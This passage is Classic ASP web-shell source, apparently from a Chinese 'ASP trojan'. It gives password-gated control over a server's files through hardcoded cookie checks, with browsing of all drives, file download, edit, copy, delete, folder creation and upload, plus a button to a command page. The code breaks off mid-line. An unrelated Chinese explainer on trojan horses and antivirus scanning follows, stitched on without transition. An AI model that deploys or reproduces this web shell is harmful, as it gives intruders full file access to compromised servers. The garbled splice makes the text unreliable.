＜%end if%＞

＜%case "down.asp"

call downloadFile(request("path"))

function downloadFile(strFile)

strFilename = strFile

Response.Buffer = True

Response.Clear

set s = Server.CreateObject("adodb.stream")

s.Open

s.Type = 1

if not oFileSys.FileExists(strFilename) then

Response.Write("＜h1＞Error:＜/h1＞" strFilename " does not exist＜p＞")

Response.End

end if

Set f = oFileSys.GetFile(strFilename)

intFilelength = f.size

s.LoadFromFile(strFilename)

if err then

Response.Write("＜h1＞Error: ＜/h1＞" err.Description "＜p＞")

Response.End

end if

Response.AddHeader "Content-Disposition", "attachment; filename=" f.name

Response.AddHeader "Content-Length", intFilelength

Response.CharSet = "UTF-8"

Response.ContentType = "application/octet-stream"

Response.BinaryWrite s.Read

Response.Flush

s.Close

Set s = Nothing

response.end

End Function

%＞

＜%case "list.asp"%＞

＜%

urlpath=server.urlencode(path)

if Request.Cookies("password")="7758521" then

dim cpath,lpath

if Request("path")="" then

lpath="/"

else

lpath=Request("path")"/"

end if

if Request("attrib")="true" then

cpath=lpath

attrib="true"

else

cpath=Server.MapPath(lpath)

attrib=""

end if

Sub GetFolder()

dim theFolder,theSubFolders

if oFileSys.FolderExists(cpath)then

Set theFolder=oFileSys.GetFolder(cpath)

Set theSubFolders=theFolder.SubFolders

Response.write"＜a href='" rseb "?q=list.asppath="Request("oldpath")"attrib="attrib"'＞＜font color='#FF8000'＞■＜/font＞↑＜font color='ff2222'＞回上级目录＜/font＞＜/a＞＜br＞＜script language=vbscript＞"

For Each x In theSubFolders

%＞so "＜%=lpath%＞","＜%=x.Name%＞","＜%=request("path")%＞","＜%=attrib%＞"

＜%

Next

%＞＜/script＞＜%

end if

End Sub

Sub GetFile()

dim theFiles

if oFileSys.FolderExists(cpath)then

Set theFolder=oFileSys.GetFolder(cpath)

Set theFiles=theFolder.Files

Response.write"＜table border='0' width='100%' cellpadding='0'＞＜script language=vbscript＞"

For Each x In theFiles

if Request("attrib")="true" then

showstring=x.Name

else

showstring=x.Name

end if

%＞sf "＜%=showstring%＞","＜%=x.size%＞","＜%=x.type%＞","＜%=x.Attributes%＞","＜%=x.DateLastModified%＞","＜%=lpath%＞","＜%=x.name%＞","＜%=attrib%＞","＜%=x.name%＞"

＜%

Next

end if

Response.write"＜/script＞＜/table＞"

End Sub

%＞

＜html＞

＜head＞

＜meta http-equiv="Content-Type" content="text/html; charset=gb2312"＞

＜title＞＜%=httpt%＞＜/title＞

＜style type="text/css"＞

＜!--

table{ font-family: 宋体; font-size: 9pt }

a{ font-family: 宋体; font-size: 9pt; color: rgb(0,32,64); text-decoration: none }

a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: none }

a:visited{ color: rgb(128,0,0) }

td { font-size: 9pt}

a { color: #000000; text-decoration: none}

a:hover { text-decoration: underline}

.tx { height: 16px; width: 30px; border-color: black black #000000; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px; font-size: 9pt; background-color: #eeeeee; color: #0000FF}

.bt { font-size: 9pt; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; height: 16px; width: 80px; background-color: #eeeeee; cursor: hand}

.tx1 { height: 18px; width: 60px; font-size: 9pt; border: 1px solid; border-color: black black #000000; color: #0000FF}

--＞

＜/style＞

＜/head＞

＜script language="JavaScript"＞

function crfile(ls)

{if (ls==""){alert("请输入文件名!");}

else {window.open("＜%=rseb%＞?q=edit.aspattrib=＜%=request("attrib")%＞creat=yespath=＜%=lpath%＞"+ls);}

return false;

}

function crdir(ls)

{if (ls==""){alert("请输入文件名!");}

else {window.open("＜%=rseb%＞?q=edir.aspattrib=＜%=request("attrib")%＞op=creatpath=＜%=lpath%＞"+ls);}

return false;

}

＜/script＞

＜script language="vbscript"＞

sub sf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name)

document.write "＜tr style=""color: #000000; background-color: #FFefdf; text-decoration: blink; border: 1px solid #000080"" onMouseOver=""this.style.backgroundColor = '#FFCC00'"" onMouseOut=""this.style.backgroundColor = '#FFefdf'""＞＜td width='50%'＞＜font color='#FF8000'＞＜font face=Wingdings＞+＜/font＞＜/font＞＜a href='" urlpath lpath xName "' target='_blank'＞＜strong＞" showstring "＜/strong＞＜/a＞＜/td＞＜td width='20%' align='right'＞" size "字节＜/td＞＜td width='30%'＞＜a href='#' title='类型：" type1 chr(10) "属性：" Attributes chr(10) "时间：" DateLastModified "'＞属性＜/a＞ ＜a href='＜%=rseb%＞?q=edit.asppath=" lpath xName "attrib=" attrib "' target='_blank' ＞＜font color='#FF8000' ＞＜/font＞编辑＜/a＞ ＜a href="chr(34)"javascript: rmdir1('" lpath xName "')"chr(34)"＞＜font color='#FF8000' ＞＜/font＞删除＜/a＞ ＜a href='#' onclick=copyfile('" lpath Name "')＞＜font color='#FF8000' ＞＜/font＞复制＜/a＞ ＜a href='＜%=rseb%＞?q=down.asppath=＜%=cpath%＞\"xName"attrib=" attrib "' target='_blank' ＞＜font color='#FF8000' ＞＜/font＞下载＜/a＞＜/td＞＜/tr＞"

end sub

sub so(lpath,xName,path,attrib)

document.write "＜a href='＜%=rseb%＞?q=list.asppath=" lpath xName "oldpath=" path "attrib=" attrib "'＞└＜font color='#FF8000'＞＜font face=Wingdings＞1＜/font＞＜/font＞ " xName "＜/a＞ ＜a href="chr(34)"javascript: rmdir('" lpath xName "')"chr(34)"＞＜font color='#FF8000' ＞＜/font＞删除＜/a＞＜br＞"

end sub

sub rmdir1(ls)

if confirm("你真的要删除这个文件吗!"Chr(13)Chr(10)"文件为："ls) then

window.open("＜%=rseb%＞?q=edit.asppath=" ls "op=delattrib=＜%=request("attrib")%＞")

end if

end sub

sub rmdir(ls)

if confirm("你真的要删除这个目录吗!"Chr(13)Chr(10)"目录为："ls) then

window.open("＜%=rseb%＞?q=edir.asppath="ls"op=delattrib=＜%=request("attrib")%＞")

end if

end sub

sub copyfile(sfile)

dfile=InputBox("※文件复制※"Chr(13)Chr(10)"源文件：" sfileChr(13)Chr(10)"输入目标文件的文件名:"Chr(13)Chr(10) "[允许带路径,要根据你的当前路径模式]")

dfile=trim(dfile)

attrib="＜%=request("attrib")%＞"

if dfile＜＞"" then

if InStr(dfile,":") or InStr(dfile,"/")=1 then

lp=""

if InStr(dfile,":") and attrib＜＞"true" then

alert "对不起，你在相对路径模式下不能使用绝对路径"Chr(13)Chr(10)"错误路径：["dfile"]"

exit sub

end if

else

lp="＜%=lpath%＞"

end if

window.open("＜%=rseb%＞?q=edit.asppath="+sfile+"op=copyattrib="+attrib+"dpath="+lp+dfile)

else

alert"您没有输入文件名！"

end If

end sub

＜/script＞

＜body＞

＜table border="1" width="100%" cellpadding="0" height="81" bordercolorlight="#000000"

bordercolordark="#FFFFFF" cellspacing="0"＞

＜tr＞

＜td width="755" bgcolor="#000080" colspan="2" height="23"＞＜p align="center"＞＜font size="3"

color="#FFFFFF"＞＜%=httpt%＞＜/font＞＜/td＞

＜/tr＞

＜tr＞

＜td width="751" bgcolor="#C0C0C0" colspan="2"＞※换盘：＜span

style="background-color: rgb(255,255,255);color:rgb(255,0,0)"＞＜%

For Each thing in oFileSys.Drives

Response.write "＜font face=Wingdings＞:＜/font＞＜a href='" rseb "?q=list.asppath="thing.DriveLetter":attrib=true'＞"thing.DriveLetter":＜/a＞"

NEXT

%＞ ＜/span＞ 地址：

＜%= "\\" oScriptNet.ComputerName "\" oScriptNet.UserName %＞＜/td＞

＜/tr＞

＜tr＞

＜td width="751" bgcolor="#C0C0C0" colspan="2"＞※＜%

if Request("attrib")="true" then

response.write "＜a href='" rseb "?q=list.asp'＞切到相对路径＜/a＞"

else

response.write "＜a href='" rseb "?attrib=trueq=list.asp'＞切到绝对路径＜/a＞"

end if

%＞ ※绝对:＜span

style="background-color: rgb(255,255,255)"＞＜%=cpath%＞＜/span＞＜/td＞

＜/tr＞

＜tr＞

＜td width="751" bgcolor="#C0C0C0" colspan="2"＞※当前＜font color="#FF8000"＞＜font face=Wingdings＞1＜/font＞＜/font＞:＜span style="background-color: rgb(255,255,255)"＞＜%=lpath%＞＜/span＞ ＜/td＞

＜/tr＞＜form name="form1" method="post" action="＜%=rseb%＞?q=upfile.asp" target="_blank" enctype="multipart/form-data"＞

＜tr＞＜td bgcolor="#C0C0C0" colspan="2" style="height: 20px"＞

编辑|

＜input class="5fba-4c5c-5bca-bed0 tx1" type="text" name="filename" size="20"＞

＜input class="4c5c-5bca-bed0-11a6 tx1" type="button" value="建文" onclick="crfile(form1.filename.value)"＞

＜input class="5bca-bed0-11a6-923a tx1" type="button" value="建目" onclick="crdir(form1.filename.value)"＞

＜input type="file" name="file1" class="bed0-11a6-923a-26dd tx1" style="width:100" value=""＞

＜input type="text" name="filepath" class="b42d-b81f-479f-6f3e tx1" style="width:100" value="＜%=cpath%＞"＞

＜input type="hidden" name="act" value="upload"＞

＜input type="hidden" name="upcount" class="b81f-479f-6f3e-14c1 tx" value="1"＞

＜input class="479f-6f3e-14c1-0eb9 tx1" type="submit" value="上传"＞

＜input class="6f3e-14c1-0eb9-6768 tx1" type="button" onclick="window.open('＜%=rseb%＞?q=cmd.asp','_blank')" value="命令"＞

＜input class="14c1-0eb9-6768-7428 tx1" type="button" onclick="window.open('＜%=rseb%＞?q=test.asp','_blank')" value="配置"＞

＜input class="0eb9-6768-7428-db02 tx1" type="button" onclick="window.open('＜%=rseb%＞?q=p.asp','_blank')" value="nfso"＞

＜/td＞

＜/td＞

＜/tr＞＜/form＞

＜tr＞

＜td width="169" valign="top" bgcolor="#C8E3FF"＞＜%Call GetFolder()%＞

＜/td＞

＜td width="582" valign="top" bgcolor="#FFefdf"＞＜%Call GetFile()%＞

＜/td＞

＜/tr＞

＜/table＞

＜%else

response.write "Password Error!"

response.write "＜a href='" rseb "?q=" rseb "'＞【返 回】＜/a＞"

end if

%＞

＜/body＞

＜/html＞

＜%case "edit.asp"%＞

＜html＞

＜head＞

＜meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80"＞

＜title＞编辑源代码＜/title＞

＜style＞

＜!--

table{ font-family: 宋体; font-size: 12pt }

a{ font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none }

a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: underline }

a:visited{ color: rgb(128,0,0) }

--＞

＜/style＞

＜/head＞

＜body＞

＜% '读文件

if Request.Cookies("password")="7758521" then

if request("op")="del" then

if Request("attrib")="true" then

whichfile=Request("path")

else

whichfile=server.mappath(Request("path"))

end if

Set thisfile = oFileSys.GetFile(whichfile)

thisfile.Delete True

Response.write "＜script＞alert('删除成功！要刷新才能看到效果');window.close();＜/script＞"

else

if request("op")="copy" then

if Request("attrib")="true" then

whichfile=Request("path")

dsfile=Request("dpath")

else

whichfile=server.mappath(Request("path"))

dsfile=Server.MapPath(Request("dpath"))

end if

Set thisfile = oFileSys.GetFile(whichfile)

thisfile.copy dsfile

%＞

＜script language=vbscript＞

msgbox "源文件：＜%=whichfile%＞" vbcrlf "目的文件:＜%=dsfile%＞" vbcrlf "复制成功！要刷新才能看到效果!"

window.close()

＜/script＞

＜%

else

if request.form("text")="" then

if Request("creat")＜＞"yes" then

if Request("attrib")="true" then

whichfile=Request("path")

else

whichfile=server.mappath(Request("path"))

end if

Set thisfile = oFileSys.OpenTextFile(whichfile, 1, False)

counter=0

thisline=thisfile.readall

thisfile.Close

set fs=nothing

end if

%＞

＜form method="POST" action="＜%=rseb%＞?q=edit.asp"＞

＜input type="hidden" name="attrib" value="＜%=Request("attrib")%＞"＞＜table border="0"

width="700" cellpadding="0"＞

＜tr＞

＜td width="100%" bgcolor="#FFDBCA"＞＜div align="center"＞＜center＞＜p＞＜%=httpt%＞＜/td＞

＜/tr＞

＜tr align="center"＞

＜td width="100%" bgcolor="#FFDBCA"＞文件名：＜input type="text" name="path" size="45"

value="＜%=Request("path")%＞ "＞直接更改文件名，相当于“另存为”＜/td＞

＜/tr＞

＜tr align="center"＞

＜td width="100%" bgcolor="#FFDBCA"＞＜textarea rows="25" name="text" cols="90"＞＜%=thisline%＞＜/textarea＞＜/td＞

＜/tr＞

＜tr align="center"＞

＜td width="100%" bgcolor="#FFDBCA"＞＜div align="center"＞＜center＞＜p＞＜input type="submit"

value="提交" name="B1"＞＜input type="reset" value="复原" name="B2"＞＜/td＞

＜/tr＞

＜/table＞

＜/form＞

＜%else

if Request("attrib")="true" then

whichfile=Request("path")

else

whichfile=server.mappath(Request("path"))

end if

Set outfile=oFileSys.CreateTextFile(whichfile)

outfile.WriteLine Request("text")

outfile.close

set fs=nothing

Response.write "＜script＞alert('修改成功！要刷新才能看到效果');window.close();＜/script＞"

end if

end if

end if

else

response.write "Password Error!"

response.write "＜a href='" rseb "?q=" rseb "'＞【返 回】＜/a＞"

end if

%＞

＜/body＞

＜/html＞

＜%case "edir.asp"%＞

＜html＞

＜head＞

＜meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80"＞

＜title＞目录操作＜/title＞

＜style＞

＜!--

table{ font-family: 宋体; font-size: 12pt }

a{ font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none }

a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: underline }

a:visited{ color: rgb(128,0,0) }

--＞

＜/style＞

＜/head＞

＜body＞

＜% '读文件

if Request.Cookies("password")="7758521" then

if request("op")="del" then

if Request("attrib")="true" then

whichdir=Request("path")

else

whichdir=server.mappath(Request("path"))

end if

oFileSys.DeleteFolder whichdir,True

Response.write "＜script＞alert('删除的目录为:" whichdir "删除成功！要刷新才能看到效果');window.close();＜/script＞"

else

if request("op")="creat" then

if Request("attrib")="true" then

whichdir=Request("path")

else

whichdir=server.mappath(Request("path"))

end if

oFileSys.CreateFolder whichdir

Response.write "＜script＞alert('建立的目录为:" whichdir "建立成功！要刷新才能看到效果');window.close();＜/script＞"

end if

end if

else

response.write "Password Error!"

response.write "＜a href='" rseb "?q=" rseb "'＞【返 回】＜/a＞"

end if

%＞

＜/body＞

＜/html＞

＜%

case "upfile.asp"

if Request.Cookies("password")="7758521" then

set upload=new upload_5xSoft

if upload.form("filepath")="" then

HtmEnd "请输入要上传至的目录!"

set upload=nothing

response.end

else

formPath=upload.form("filepath")

if right(formPath,1)＜＞"/" then formPath=formPath"/"

end if

iCount=0

for each formName in upload.objForm

set file=upload.file(formName)

if file.FileSize＞

什么是“木马程序”？

什么是木马

“木马”程序是目前比较流行的病毒文件，与一般的病毒不同，它不会自我繁殖，也并不“刻意”地去感染其他文件，它通过将自身伪装吸引用户下载执行，向施种木马者提供打开被种者电脑的门户，使施种者可以任意毁坏、窃取被种者的文件，甚至远程操控被种者的电脑。“木马”与计算机 *** 中常常要用到的远程控制软件有些相似，但由于远程控制软件是“善意”的控制，因此通常不具有隐蔽性；“木马”则完全相反，木马要达到的是“偷窃”性的远程控制，如果没有很强的隐蔽性的话，那就是“毫无价值”的。

一个完整的“木马”程序包含了两部分：“服务器”和“控制器”。植入被种者电脑的是“服务器”部分，而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。运行了木马程序的“服务器”以后，被种者的电脑就会有一个或几个端口被打开，使黑客可以利用这些打开的端口进入电脑系统，安全和个人隐私也就全无保障了！

木马（Trojan）这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的本意是特洛伊的,即代指特洛伊木马,也就是木马计的故事).

它是指通过一段特定的程序（木马程序）来控制另一台计算机。木马通常有两个可执行程序：一个是客户端，即控制端，另一个是服务端，即被控制端。木马的设计者为了防止木马被发现，而采用多种手段隐藏木马。木马的服务一旦运行并被控制端连接，其控制端将享有服务端的大部分操作权限，例如给计算机增加口令，浏览、移动、复制、删除文件，修改注册表，更改计算机配置等。

随着病毒编写技术的发展，木马程序对用户的威胁越来越大，尤其是一些木马程序采用了极其狡猾的手段来隐蔽自己，使普通用户很难在中毒后发觉。

木马的种类

1、普通的以单独EXE文件执行的木马

2、进程插入式木马

3、Rootkit类

4、其他

木马和病毒都是一种人为的程序,都属于电脑病毒,为什么木马要单独提出来说内?大家都知道以前的电脑病毒的作用,其实完全就是为了搞破坏,破坏电脑里的资料数据,除了破坏之外其它无非就是有些病毒制造者为了达到某些目的而进行的威慑和敲诈勒索的作用,或为了炫耀自己的技术. "木马"不一样,木马的作用是 *** 裸的偷偷监视别人和盗窃别人密码,数据等,如盗窃管理员密码-子网密码搞破坏,或者好玩,偷窃上网密码用于它用,游戏帐号,股票帐号,甚至网上银行帐户等.达到偷窥别人隐私和得到经济利益的目的.所以木马的作用比早期的电脑病毒更加有用.更能够直接达到使用者的目的!导致许多别有用心的程序开发者大量的编写这类带有偷窃和监视别人电脑的侵入性程序,这就是目前网上大量木马泛滥成灾的原因.鉴于木马的这些巨大危害性和它与早期病毒的作用性质不一样,所以木马虽然属于病毒中的一类,但是要单独的从病毒类型中间剥离出来.独立的称之为"木马"程序.

一般来说一种杀毒软件程序,它的木马专杀程序能够查杀某某木马的话,那么它自己的普通杀毒程序也当然能够杀掉这种木马,因为在木马泛滥的今天,为木马单独设计一个专门的木马查杀工具,那是能提高该杀毒软件的产品档次的,对其声誉也大大的有益,实际上一般的普通杀毒软件里都包含了对木马的查杀功能.如果现在大家说某某杀毒软件没有木马专杀的程序,那这家杀毒软件厂商自己也好像有点过意不去,即使它的普通杀毒软件里当然的有杀除木马的功能.

还有一点就是,把查杀木马程序单独剥离出来,可以提高查杀效率,现在很多杀毒软件里的木马专杀程序只对木马进行查杀,不去检查普通病毒库里的病毒代码,也就是说当用户运行木马专杀程序的时候,程序只调用木马代码库里的数据,而不调用病毒代码库里的数据,大大提高木马查杀速度.我们知道查杀普通病毒的速度是比较慢的,因为现在有太多太多的病毒.每个文件要经过几万条木马代码的检验,然后再加上已知的差不多有近10万个病毒代码的检验,那速度岂不是很慢了.省去普通病毒代码检验,是不是就提高了效率,提高了速度内? 也就是说现在好多杀毒软件自带的木马专杀程序只查杀木马而一般不去查杀病毒,但是它自身的普通病毒查杀程序既查杀病毒又查杀木马!